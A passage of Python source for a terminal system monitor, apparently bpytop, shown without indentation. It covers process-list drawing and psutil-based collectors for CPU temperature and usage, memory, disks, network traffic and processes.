del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count == 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in it's own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
else:
cls.collect_queue = list(cls.__subclasses__())
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], text=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", text=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3]
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0:
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0:
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp:
temp = core_dict.get(0, 0)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if not CORE_MAP[x] in core_dict:
continue
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], text=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", text=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", text=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
io_error: bool = False
old_disks: List[str] = []
excludes: List[str] = ["squashfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string: str
u_percent: int
disk_list: List[str] = []
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM == "Linux", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
for disk in psutil.disk_partitions():
disk_io = None
io_string = ""
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
while disk_name in disk_list: disk_name += "_"
disk_list += [disk_name]
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk_name.endswith(filtering)) or (filter_exclude and disk_name.endswith(filtering))):
continue
#elif filtering and disk_name.endswith(filtering)
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(disk_u.percent)
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM == "Linux":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if dev_name.startswith("md"):
try:
dev_name = dev_name[:dev_name.index("p")]
except:
pass
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if MemBox.disks_width > 30:
if disk_read > 0:
io_string += f'▲{floating_humanizer(disk_read, short=True)} '
if disk_write > 0:
io_string += f'▼{floating_humanizer(disk_write, short=True)}'
elif disk_read + disk_write > 0:
io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if disk_list != cls.old_disks:
MemBox.redraw = True
cls.old_disks = disk_list.copy()
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
sync_top: int = 0
sync_string: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
@classmethod
def switch(cls, key: str):
if len(cls.nics) < 2: return
cls.nic_i += +1 if key == "n" else -1
if cls.nic_i >= len(cls.nics): cls.nic_i = 0
elif cls.nic_i < 0: cls.nic_i = len(cls.nics) - 1
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat or not up_stat[cls.nic].isup:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
pass
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent'''
if Box.stat_mode: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: str = cls.search_filter
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
for s in search.split(","):
if s.strip() in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
